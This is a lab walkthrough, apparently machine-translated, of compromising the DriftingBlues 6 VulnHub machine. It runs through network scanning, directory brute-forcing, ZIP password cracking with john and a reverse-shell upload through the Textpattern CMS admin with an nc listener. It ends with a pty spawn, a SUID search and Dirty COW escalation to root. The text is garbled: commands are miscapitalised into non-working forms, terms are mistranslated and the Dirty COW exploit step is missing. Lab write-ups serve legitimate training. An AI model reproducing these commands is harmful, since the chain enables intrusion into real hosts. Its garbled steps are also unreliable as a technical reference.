target address: https://www.vulnhub.com/entry/driftingblues-6,672/

1, the host to explore

ARP -SCAN -i ETH0 -L (specified network card scan) Scan all devices of the LAN (all device IP, MAC address, manufacturer information)
MASSCAN 192.168.111.0/24 -P 80,22 (network segment scanned by Masscan -P scan port number)
NetDiscover -i ETH0 -R 192.168.184.0/24
nmap -sn 192.168.111.0/24

2, port scan

nmap -sS -A -sV -T4 -p- 192.168.111.18
80—http—Apache httpd 2.2.22 ((Debian))

3, 80 access, you can find nothing, check the source code, then scan a wave of directory

gobuster dir -u “http://192.168.111.18/” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

See the familiar old friend: /robots.txt, visit as follows

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

Visit/TextPattern/TextPattern/see the following
Fingerprint recognition is TextPattern CMS

ROBOTS.TXT also prompts not to forget the ZIP, see that /spammer.zip in the scanning result, download a compressed package, try to open up a password with a password
4. Use Kali to crack the ZIP compressed package password

1、zip2john spammer.zip > password.txt
2、john –wordlist=/usr/share/wordlists/rockyou.txt password.txt

The password is: myspace4, after decompression file, open the file and check the file content to get the account password Mayer: Lionheart

5. After entering, I see that the CMS version is 4.8.3

Think 1: Kali Local Search Vulnerability: Searchsploit TextPattern 4.8.3, after testing and failure
Think 2: Find and use points on the background page

In Content, I found the existing file upload

Upload our rebound shell horse (note that the IP and ports of the Marili face must be changed to your own Kali IP), there is no way to display

But we can see the upload address on the admin management interface

kali Start supervision: NC -LVNP 1234 
 Visit our horses to get a rebound shell 

 Use python to switch to Bash: python -c 'Import Pty; pty.spawn ("/bin/bash")'

6. Try to mention rights

1. Try SUID to mention: Find/-PERM -U = S -Type F 2>/DEV/NULL 
 In https: /gtfobins.github.io/ 

 2. Uname -A 
 Linux DriftingBlues 3.2.0-4-AMD

Then we use login Firefart, the password is entered by ourselves (I entered root) to get root permissions

Summary:
1. Information collection Get sensitive file
2, ZIP2JOHN+JOHN cracking ZIP password
3. Use the background file to upload to get webshell
4, dirty cattle to get right to get root permissions

End of scattered flowers ~

Reference: https://www.freebuf.com/articleS/otheres-rTICLES/279360.html
https://blog.csdn.net/weixin_43967893/article/details/115873236
https://blog.csdn.net/Aluxian_/article/details/123594952
Peng Group Safety Master provided WP